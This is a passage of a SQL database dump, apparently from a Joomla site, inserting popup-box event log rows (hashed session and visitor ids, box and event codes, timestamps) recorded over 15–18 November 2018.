(30489, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-15 14:18:27'),
(30490, '812dc0e04e5612de6778a4209fa99b16', 'bbaa14f2a5d57b33', 0, 2, 1, '2018-11-15 14:32:56'),
(30491, '812dc0e04e5612de6778a4209fa99b16', 'bbaa14f2a5d57b33', 0, 2, 1, '2018-11-15 14:33:13'),
(30492, '812dc0e04e5612de6778a4209fa99b16', 'bbaa14f2a5d57b33', 0, 2, 1, '2018-11-15 14:33:31'),
(30493, 'b9a516f4fefd402a151a7b3c3b94658e', '62f1862aa9c554f8', 0, 2, 1, '2018-11-15 14:37:53'),
(30494, '8e3e9043766c764f2b0b409ada7fbeb6', 'e2328e2af7d43e58', 0, 2, 1, '2018-11-15 14:55:01'),
(30495, '8b7c5db2d72fd810e9d70372937d6bbf', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-15 15:16:52'),
(30496, '8b7c5db2d72fd810e9d70372937d6bbf', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-15 15:19:22'),
(30497, '23b855707bbc8bdcc7da56356cecaeeb', 'c30afd725ff2cc24', 0, 2, 1, '2018-11-15 15:32:34'),
(30498, 'bd62b506d799d2cde57af082a897cb7b', '20d1ae4ab5438e87', 0, 2, 1, '2018-11-15 16:37:34'),
(30499, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:45:47'),
(30500, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:47:03'),
(30501, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:47:03'),
(30502, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:50:27'),
(30503, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:50:34'),
(30504, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:52:44'),
(30505, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:54:51'),
(30506, '9ce70a742096ea2fbe9987f15cf2bc35', 'cedfede1dd4805e0', 0, 2, 1, '2018-11-15 16:58:06'),
(30507, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 16:59:49'),
(30508, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:00:12'),
(30509, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:08:16'),
(30510, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:12:25'),
(30511, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:12:44'),
(30512, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:13:14'),
(30513, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:14:06'),
(30514, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:14:14'),
(30515, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:14:28'),
(30516, '5a6cabdf5b8f0cf84ac7d25cb5604687', '18940e517db8c54f', 0, 2, 1, '2018-11-15 17:17:15'),
(30517, '0dba10ffbc2a8f3eaec7eb6580412eaf', '3519c75b0484909f', 0, 2, 1, '2018-11-15 17:22:24'),
(30518, '1ba0353c7efdc0ed461bdd06869c29bf', '59f9e41364057697', 0, 2, 1, '2018-11-15 18:00:38'),
(30519, '23c179128c1f8e08ac309e4ed5d2ec05', '176394403330e0c1', 0, 2, 1, '2018-11-15 18:02:43'),
(30520, 'de0fe09f596dfc8dcc7e20aba7d5d67f', '4f57479ae93de220', 0, 2, 1, '2018-11-15 18:51:46'),
(30521, 'de0fe09f596dfc8dcc7e20aba7d5d67f', '4f57479ae93de220', 0, 2, 1, '2018-11-15 18:52:08'),
(30522, 'de0fe09f596dfc8dcc7e20aba7d5d67f', '4f57479ae93de220', 0, 2, 1, '2018-11-15 18:59:26'),
(30523, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:47:05'),
(30524, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-15 19:48:03'),
(30525, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:48:27'),
(30526, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:50:51'),
(30527, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:51:14'),
(30528, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:52:40'),
(30529, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:53:05'),
(30530, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:53:24'),
(30531, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:54:00'),
(30532, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:54:31'),
(30533, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:54:51'),
(30534, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:55:50'),
(30535, '85346f17266f542fa4194bc27af9f43f', 'a3dfd173eb7f4838', 0, 2, 1, '2018-11-15 19:56:46'),
(30536, '633335ea4b6191eb00c605233c2819c8', '51459d3cd6e21c85', 0, 2, 1, '2018-11-15 20:02:00'),
(30537, '2b49c21373fc59e3a727689d7e5331c4', 'bb342b58f61ab4b2', 0, 2, 1, '2018-11-15 21:13:32'),
(30538, 'f515a0fb96b62d2174e7c69d4e3ece5d', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-15 21:30:08'),
(30539, '97061a4c2e10d83d4367e5a9e9fae5db', '53cff801380269e8', 0, 2, 1, '2018-11-15 22:10:11'),
(30540, 'e7acb5b55e7780a728519b8ea7574bb4', '7c5bcf99f2070582', 0, 2, 1, '2018-11-15 22:28:07'),
(30541, '97061a4c2e10d83d4367e5a9e9fae5db', '53cff801380269e8', 0, 2, 1, '2018-11-15 23:05:59'),
(30542, '97061a4c2e10d83d4367e5a9e9fae5db', '53cff801380269e8', 0, 2, 1, '2018-11-15 23:17:02'),
(30543, 'a0c00a9e9bb254caa557c7f75c380ecc', '26ec9d07c9ea897f', 0, 2, 1, '2018-11-16 00:15:29'),
(30544, 'bcaae847a5b8ad5eb136655875d358ba', 'e659f210dd13df77', 0, 2, 1, '2018-11-16 01:38:13'),
(30545, 'f206d51eb1a1daba776b61e2be7f1139', 'fa3e2a81f916bbbc', 0, 2, 1, '2018-11-16 02:25:25'),
(30546, '2284a0685081d03cf68901bf5223d5eb', 'c32af874981d3f31', 0, 2, 1, '2018-11-16 02:26:36'),
(30547, '2caa5bfbfa789a300abef4668fc3f8a4', 'a1673bbe29be242a', 0, 2, 1, '2018-11-16 03:19:51'),
(30548, '5e9ee83c568864d9e8a318a161c7252c', 'e9886b3163f3b0eb', 0, 2, 1, '2018-11-16 03:43:10'),
(30549, '1c5860dc1f78bd330ade7419f159d5c9', '4e1055666276ff20', 0, 2, 1, '2018-11-16 04:10:25'),
(30550, '17db4c49bc89fd7ac6fcbbde38f81134', '381aa1d8da306be0', 0, 2, 1, '2018-11-16 04:39:53'),
(30551, '833acab8fbc0ee0179aa74fcce5835c8', '9e3b1ab2252047b5', 0, 2, 1, '2018-11-16 04:52:00'),
(30552, '833acab8fbc0ee0179aa74fcce5835c8', '9e3b1ab2252047b5', 0, 2, 1, '2018-11-16 04:56:19'),
(30553, '833acab8fbc0ee0179aa74fcce5835c8', '9e3b1ab2252047b5', 0, 2, 1, '2018-11-16 04:57:11'),
(30554, '833acab8fbc0ee0179aa74fcce5835c8', '9e3b1ab2252047b5', 0, 2, 1, '2018-11-16 04:57:16'),
(30555, '55e5bbe6d34148df7a359878d4a48022', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-16 06:07:19'),
(30556, '55e5bbe6d34148df7a359878d4a48022', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-16 06:07:29'),
(30557, 'ca31dd2ca23b146be191f5bb1d8072da', '29e79414e3022450', 0, 2, 1, '2018-11-16 06:21:48'),
(30558, '9239df63216adc3e92b002969e856aef', '40935b06da843263', 0, 2, 1, '2018-11-16 06:21:49'),
(30559, 'ec6ac8bbb379834d84766f7319669d14', '6ee2eed3dbea61d3', 0, 2, 1, '2018-11-16 06:28:53'),
(30560, 'e29c9c2565473f6654c03809282d5b55', 'edaaa96d3c921087', 0, 2, 1, '2018-11-16 06:36:39'),
(30561, 'c58e262517c4cd0b1187fd3887bc692a', '5d05c790f4830fad', 0, 2, 1, '2018-11-16 06:57:10'),
(30562, '3c7255e2a040ab224c1379734c478145', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-16 07:22:00'),
(30563, '3c7255e2a040ab224c1379734c478145', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-16 07:22:13'),
(30564, '3c7255e2a040ab224c1379734c478145', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-16 07:22:26'),
(30565, '3c7255e2a040ab224c1379734c478145', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-16 07:22:45'),
(30566, 'ebce4075fbc77fc4c8cbc0935910e46c', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-16 08:04:59'),
(30567, '16df76f803c71de2ac9659d2b445d3f5', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-16 08:06:17'),
(30568, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:20:05'),
(30569, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:21:15'),
(30570, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:21:52'),
(30571, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:24:25'),
(30572, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:24:48'),
(30573, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:25:40'),
(30574, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:25:54'),
(30575, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:26:43'),
(30576, 'dea6c8af648c8caddb8d529e76aaf657', '2866889c60f22f2f', 0, 2, 1, '2018-11-16 08:27:29'),
(30577, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-16 08:29:12'),
(30578, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-16 08:29:30'),
(30579, '9d102b664e344c63d8787ee3808d3a0d', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-11-16 08:32:21'),
(30580, '9d102b664e344c63d8787ee3808d3a0d', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-11-16 08:32:30'),
(30581, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-16 08:41:28'),
(30582, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-16 09:39:44'),
(30583, 'ac015db0909717707aba89c136b6547f', '2c40db9faa576984', 0, 2, 1, '2018-11-16 09:44:44'),
(30584, '16df76f803c71de2ac9659d2b445d3f5', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-16 09:52:16'),
(30585, '6c7bb225ca6f341685f7027af9aef893', '3ccd8d5695a69616', 0, 2, 1, '2018-11-16 09:57:41'),
(30586, 'cce6f1f2d07bd87cddc78dbb7af4e10b', 'cedfede1dd4805e0', 0, 2, 1, '2018-11-16 10:00:25'),
(30587, '2df840d0c58a8763541d5ad5671cd703', 'f9c958deb24c5b0d', 0, 2, 1, '2018-11-16 10:50:57'),
(30588, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-16 10:52:31'),
(30589, 'cc1c3340b6de271da2d1d886462d12c8', '27ee3f0ff6fd83ef', 0, 2, 1, '2018-11-16 10:55:28'),
(30590, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-16 11:17:59'),
(30591, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-16 11:18:24'),
(30592, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-16 11:18:40'),
(30593, '828241af6801f3400b981c4f0ae92abe', '268978f515474fb3', 0, 2, 1, '2018-11-16 11:53:48'),
(30594, '80bb24f3e29789506cb11737de9d9ca0', '624d6937076d1188', 0, 2, 1, '2018-11-16 11:54:43'),
(30595, 'a8456da04a01b0f3b6f9841be0b0c81e', '78a6e1eb939b04c9', 0, 2, 1, '2018-11-16 12:10:45'),
(30596, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-16 13:00:01'),
(30597, '1e478c8373ca16a13d2a91ced73a647b', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-16 13:29:28'),
(30598, '94f7702e2c1911c532ee08633764fd68', '2622b37d94f09b78', 0, 2, 1, '2018-11-16 13:29:54'),
(30599, '1e478c8373ca16a13d2a91ced73a647b', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-16 13:31:40'),
(30600, '0159db4e050c7276650d1c03d42af891', '278cf268e36e9abf', 0, 2, 1, '2018-11-16 13:44:35'),
(30601, '0159db4e050c7276650d1c03d42af891', '278cf268e36e9abf', 0, 2, 1, '2018-11-16 13:44:41'),
(30602, '4808d70d49db8d6bb4d7655dccefd6b6', 'f3f3de8bf97f7b07', 0, 2, 1, '2018-11-16 13:52:16'),
(30603, '785bc4c82f75b8eaeba5f083611d11c1', '1978b4519e61eb4b', 0, 2, 1, '2018-11-16 14:19:02'),
(30604, 'faa3a24e6cf6fca52e86f907fc5392ca', 'c0a8b9589aefbbcc', 0, 2, 1, '2018-11-16 15:10:25'),
(30605, '8e3a88051b7d665eccd5e5451fb08f8b', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-16 15:22:05'),
(30606, '43a75841e19346d5f8e83d3c5343b617', 'ff744a4d90b6a515', 0, 2, 1, '2018-11-16 15:49:28'),
(30607, '78912b3f2d196cb062828524573703be', '02b64f4844ad5b20', 0, 2, 1, '2018-11-16 15:50:33'),
(30608, 'df3eced8b687a4dab4837577e07c7f0f', 'be91c7770f89b3b2', 0, 2, 1, '2018-11-16 15:55:21'),
(30609, 'df3eced8b687a4dab4837577e07c7f0f', 'be91c7770f89b3b2', 0, 2, 1, '2018-11-16 15:55:28'),
(30610, 'df3eced8b687a4dab4837577e07c7f0f', 'be91c7770f89b3b2', 0, 2, 1, '2018-11-16 15:55:36'),
(30611, 'df3eced8b687a4dab4837577e07c7f0f', 'be91c7770f89b3b2', 0, 2, 1, '2018-11-16 15:55:52'),
(30612, 'df3eced8b687a4dab4837577e07c7f0f', 'be91c7770f89b3b2', 0, 2, 1, '2018-11-16 15:56:38'),
(30613, 'bd29ad68558f1b044d11ed58dd2b4f40', '22905843105c275f', 0, 2, 1, '2018-11-16 15:57:14'),
(30614, 'bd29ad68558f1b044d11ed58dd2b4f40', '22905843105c275f', 0, 2, 1, '2018-11-16 16:11:16'),
(30615, 'a2a94ec8bdf224839a1472167a560a67', '617e99311e6f563a', 0, 2, 1, '2018-11-16 16:20:55'),
(30616, '4ef906994608ba984034359aaf4d4eec', '1c68b977b911188c', 0, 2, 1, '2018-11-16 16:42:50'),
(30617, '04e05e035eba68763dd60164073bb4c8', 'ead365992b655192', 0, 2, 1, '2018-11-16 17:04:38'),
(30618, '817fcbcdea331b68009ffa026dc20d93', '93f30eaefda9d8c4', 0, 2, 1, '2018-11-16 17:33:23'),
(30619, '6a2fdd15827119296089d7cc40d42133', '1708a76621e716d9', 0, 2, 1, '2018-11-16 18:00:38'),
(30620, 'ef64b9eebefbe3658fc038947d9d4d4f', '9f7038c5e474dbd1', 0, 2, 1, '2018-11-16 18:15:08'),
(30621, '273120016778fbd4da12d03922e3a110', 'b841ddbceedf41d0', 0, 2, 1, '2018-11-16 18:15:13'),
(30622, 'bc712b6b4cfd2b3e9cf5a250301603f4', '19435b577b2d68c1', 0, 2, 1, '2018-11-16 18:33:21'),
(30623, 'b3a578ab5441ca63babd538b745c24a2', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-16 18:33:51'),
(30624, 'c0f177a5c1a4eebf27b2972b28aa2824', '7317fa5b6fab759f', 0, 2, 1, '2018-11-16 18:54:08'),
(30625, 'dc2773a12e9d1fae5ca4778f67c98c02', '6c773559f9ee337a', 0, 2, 1, '2018-11-16 19:58:57'),
(30626, 'dc2773a12e9d1fae5ca4778f67c98c02', '6c773559f9ee337a', 0, 2, 1, '2018-11-16 20:00:02'),
(30627, 'dc2773a12e9d1fae5ca4778f67c98c02', '6c773559f9ee337a', 0, 2, 1, '2018-11-16 20:01:05'),
(30628, 'dc2773a12e9d1fae5ca4778f67c98c02', '6c773559f9ee337a', 0, 2, 1, '2018-11-16 20:03:48'),
(30629, 'bf8e823444804d6672fef4c348f1a8f4', '0841710898269d51', 0, 2, 1, '2018-11-16 20:05:10'),
(30630, 'dc2773a12e9d1fae5ca4778f67c98c02', '6c773559f9ee337a', 0, 2, 1, '2018-11-16 20:05:11'),
(30631, '54130c88024b4bcceb75eafd41f05fc1', '77c294ca19f7a7a0', 0, 2, 1, '2018-11-16 20:06:05'),
(30632, '0b34be634505b2ae6f1f3357d484c3e7', '1480905871c80ab5', 0, 2, 1, '2018-11-16 20:35:11'),
(30633, 'fc5ee39b5610e050f1efb930087a6269', 'b3572442b61928b3', 0, 2, 1, '2018-11-16 21:25:07'),
(30634, 'a466d199896192777366f5c28e673721', 'c73d9b2f1cab13da', 0, 2, 1, '2018-11-16 21:51:34'),
(30635, 'a6656041e9576c00d00810683ce8f38d', 'c21b863ecdd30da4', 0, 2, 1, '2018-11-16 22:05:25'),
(30636, '66aaea9ce7755d38a5a411e2c88c6883', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-11-16 22:35:38'),
(30637, 'a8209088f7df812a7460e69b4dae97d0', 'f64968c9f46432ee', 0, 2, 1, '2018-11-16 22:36:50'),
(30638, '89acfc339149362739b954316f137398', '44f93b32c6fe8b21', 0, 2, 1, '2018-11-16 23:06:57'),
(30639, '3e2eb392a8dbfcfd86259278d3fb5d93', 'a4be05eec29d5c06', 0, 2, 1, '2018-11-17 00:09:14'),
(30640, 'd5bba7717c141d8a4089ad267fbcf5a8', '5689d11843c240d3', 0, 2, 1, '2018-11-17 00:14:33'),
(30641, '7997c9a723d4512b4fa5360b9396605b', '5f594947db30d695', 0, 2, 1, '2018-11-17 00:17:05'),
(30642, '65bfa5dd0dcdc5a2e5c79293621c90de', 'b8cc86d59dfd9067', 0, 2, 1, '2018-11-17 01:19:50'),
(30643, 'a324e9931522a713b91b4abbf7939573', '842fa793771cbe44', 0, 2, 1, '2018-11-17 01:23:15'),
(30644, '77de147aa5f92b959bd13cc1a666d0bb', 'e8ae614dbe8e0ad1', 0, 2, 1, '2018-11-17 01:30:35'),
(30645, 'b724a27ca7dfe163aa8faa489c2dec38', '21ff154eec309906', 0, 2, 1, '2018-11-17 01:39:54'),
(30646, '6f106619f3c401cb3da540650decf478', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-17 02:00:04'),
(30647, 'ab11dc642d4204d974d587e8d4d52af1', '85393dd606f0298d', 0, 2, 1, '2018-11-17 04:07:40'),
(30648, '380220ad0a8e98bafcca15641e385fe4', 'ec298f16abca1ffa', 0, 2, 1, '2018-11-17 04:23:58'),
(30649, '380220ad0a8e98bafcca15641e385fe4', 'ec298f16abca1ffa', 0, 2, 1, '2018-11-17 04:25:59'),
(30650, '380220ad0a8e98bafcca15641e385fe4', 'ec298f16abca1ffa', 0, 2, 1, '2018-11-17 04:26:17'),
(30651, '4dbb12ebacbd4294c7e14059ea1b009c', 'afdb985b4766b5e9', 0, 2, 1, '2018-11-17 04:30:30'),
(30652, 'be9af5ca6e28bff8fdc5134e6479ba4a', '18b6acfbcfc2de84', 0, 2, 1, '2018-11-17 04:50:36'),
(30653, '892267e0b98f164a9f2ddfdce01f0cc9', '646a5beafb31c973', 0, 2, 1, '2018-11-17 05:02:00'),
(30654, 'ada53f7f2504d2d725020fa5caf4bb0b', '381aa1d8da306be0', 0, 2, 1, '2018-11-17 07:23:52'),
(30655, 'c1ec0d60d738be141139ee7d0dc46215', '7c5bcf99f2070582', 0, 2, 1, '2018-11-17 07:28:51'),
(30656, 'c1ec0d60d738be141139ee7d0dc46215', '7c5bcf99f2070582', 0, 2, 1, '2018-11-17 07:29:15'),
(30657, '4fa46a8cdbfda391ee47ea79a2445f2a', '4b8272c521136738', 0, 2, 1, '2018-11-17 08:06:32'),
(30658, '6ed6fc1fefd6c913f7185c2599fe7e40', '43eb7ff009a3ba2b', 0, 2, 1, '2018-11-17 08:30:18'),
(30659, 'c1ec0d60d738be141139ee7d0dc46215', '7c5bcf99f2070582', 0, 2, 1, '2018-11-17 08:37:10'),
(30660, '09b3eef00fa45fbaa3b7a31223412479', 'db5f30a490f243ef', 0, 2, 1, '2018-11-17 08:55:00'),
(30661, '0626b3683e2755fa43a56751b3f98eb4', '68d0a7923f2d97da', 0, 2, 1, '2018-11-17 10:06:03'),
(30662, 'dbc382435dc01d5d48ea53c1d6c8064f', '91b7aab8062ec958', 0, 2, 1, '2018-11-17 10:56:52'),
(30663, '59329b66eb4b1dd518de7e39ab9f7006', '0bcfb2bccb364432', 0, 2, 1, '2018-11-17 11:20:30'),
(30664, '16df76f803c71de2ac9659d2b445d3f5', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-17 11:21:34'),
(30665, '25c7a939c87bef9962187e72b7a48dae', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-17 11:25:25'),
(30666, '933ebb36546af8a0edd03ba1f18c3baf', 'b76fb0c6bc9c9c44', 0, 2, 1, '2018-11-17 12:19:32'),
(30667, '25c7a939c87bef9962187e72b7a48dae', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-17 12:49:10'),
(30668, '25c7a939c87bef9962187e72b7a48dae', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-17 12:49:17'),
(30669, '25c7a939c87bef9962187e72b7a48dae', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-17 12:49:19'),
(30670, 'dd68bde30ad1c9eb1f30f9c722c81705', '2de9684eddce657e', 0, 2, 1, '2018-11-17 14:08:03'),
(30671, '64f6ad29b39245b1b5c767af40f2376a', 'b3bdf3b5186f52cc', 0, 2, 1, '2018-11-17 14:29:48'),
(30672, '20c66b564d04108f4b962a957dea1eaf', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-17 14:41:17'),
(30673, '20c66b564d04108f4b962a957dea1eaf', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-17 14:47:32'),
(30674, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 16:54:03'),
(30675, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 16:57:50'),
(30676, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 16:58:13'),
(30677, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 16:58:31');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(30678, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 17:07:39'),
(30679, '7c8aedb33b17bfaf37cafead1051fdec', '0396dbb0772efd50', 0, 2, 1, '2018-11-17 17:18:22'),
(30680, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 17:20:48'),
(30681, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 17:21:02'),
(30682, '33a548c646f277c7a5d81f5b9e9b8404', '53b3c21c14c8df3e', 0, 2, 1, '2018-11-17 17:21:16'),
(30683, 'a952dd6f053abd1284f83da23bc9a49a', 'ad1ce924de049dda', 0, 2, 1, '2018-11-17 17:53:14'),
(30684, '9734129df22e0a3c8c0cb36a5196f16e', '03c4bb20aee35949', 0, 2, 1, '2018-11-17 18:17:53'),
(30685, 'cdd4219fe32716e59492f176476adcca', 'c3a557e109d53ba9', 0, 2, 1, '2018-11-17 18:45:09'),
(30686, 'cdd4219fe32716e59492f176476adcca', 'c3a557e109d53ba9', 0, 2, 1, '2018-11-17 18:46:05'),
(30687, 'cdd4219fe32716e59492f176476adcca', 'c3a557e109d53ba9', 0, 2, 1, '2018-11-17 18:46:33'),
(30688, '1d233f8ebeb1c1e543b0b0b656b3729b', 'eca636ab4d1bcf80', 0, 2, 1, '2018-11-17 18:55:08'),
(30689, '1d233f8ebeb1c1e543b0b0b656b3729b', 'eca636ab4d1bcf80', 0, 2, 1, '2018-11-17 18:55:11'),
(30690, '20c66b564d04108f4b962a957dea1eaf', 'ebbd87f2564b6638', 0, 2, 1, '2018-11-17 19:08:52'),
(30691, '2adb8dee0bab3051f04c4f1cdbbc1039', '67edec9b21cf22e4', 0, 2, 1, '2018-11-17 19:09:27'),
(30692, '7a53be4540d5eb7950445d4c5e20ed21', 'e3163f1046dc4449', 0, 2, 1, '2018-11-17 19:18:20'),
(30693, 'b6edc578195f21a9b9608ee42ec450ac', 'b596aa182bdd2545', 0, 2, 1, '2018-11-17 19:35:09'),
(30694, '4b353789392ae5135622d4016428720a', '0e5d0d280bb0605c', 0, 2, 1, '2018-11-17 19:37:12'),
(30695, '69a5229158133f88cae68ffd9ee94da2', '2040670207965243', 0, 2, 1, '2018-11-17 20:07:49'),
(30696, '077a651d563bcb84b4ccc5bfb91cedbe', '015a365c5e05828a', 0, 2, 1, '2018-11-17 22:09:04'),
(30697, '3ae33f9729a90eac41cde1b08f6f5dc6', '11bc1dfab8312b85', 0, 2, 1, '2018-11-17 23:16:43'),
(30698, '8e92bcaf06b642bf1bc32d58810b9b6b', 'b86d0e52dd371c8a', 0, 2, 1, '2018-11-17 23:46:07'),
(30699, 'd7e9088c2b5960c2d7d30630f3ef53a7', '263966d24c877208', 0, 2, 1, '2018-11-18 00:23:52'),
(30700, '2d0798073ddb27312bc83528e4caa819', 'e6d8c17a719ede3b', 0, 2, 1, '2018-11-18 00:58:37'),
(30701, '4eafb49427e741fba1de8cc845774f03', 'f534e43d44c18269', 0, 2, 1, '2018-11-18 01:10:41'),
(30702, '5d5e5a10c296011e153d270bc1c42379', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-18 01:44:45'),
(30703, '22cd5fd6692c6ee81475ca4afd5acc6d', '7fea0eba714e7cad', 0, 2, 1, '2018-11-18 02:16:21'),
(30704, 'a33ca7620ee0fa38616204c99c2411a4', '70b55db887563775', 0, 2, 1, '2018-11-18 02:34:37'),
(30705, '534dc184b9fff02264a335b04b7804d2', '730cd1e5b833e9c9', 0, 2, 1, '2018-11-18 02:39:22'),
(30706, '67e691b0e10c46213c7cf176f0485575', '28c58ecc285fdca7', 0, 2, 1, '2018-11-18 03:02:42'),
(30707, '1835ba8ecf65972e92b327a48da5d846', '6e9a34d2437e5c5f', 0, 2, 1, '2018-11-18 04:38:33'),
(30708, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-18 04:39:15'),
(30709, '1facd1ad41f1f26739aa36ed4c1e8fa8', 'dd52734ebc50be83', 0, 2, 1, '2018-11-18 04:57:02'),
(30710, 'c7c576c4a1bd337037d9b4c94b53ce5d', 'b335903010e84d54', 0, 2, 1, '2018-11-18 05:04:00'),
(30711, 'c7c576c4a1bd337037d9b4c94b53ce5d', 'b335903010e84d54', 0, 2, 1, '2018-11-18 05:04:20'),
(30712, '85ee285ed21c6a86a8ec5052f7262c8e', '46713cac27a94b83', 0, 2, 1, '2018-11-18 05:08:09'),
(30713, '85ee285ed21c6a86a8ec5052f7262c8e', '46713cac27a94b83', 0, 2, 1, '2018-11-18 05:08:32'),
(30714, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-18 05:11:10'),
(30715, '61ff437661ea0926f7e88a66874ffb29', '17e6addad9139415', 0, 2, 1, '2018-11-18 05:12:38'),
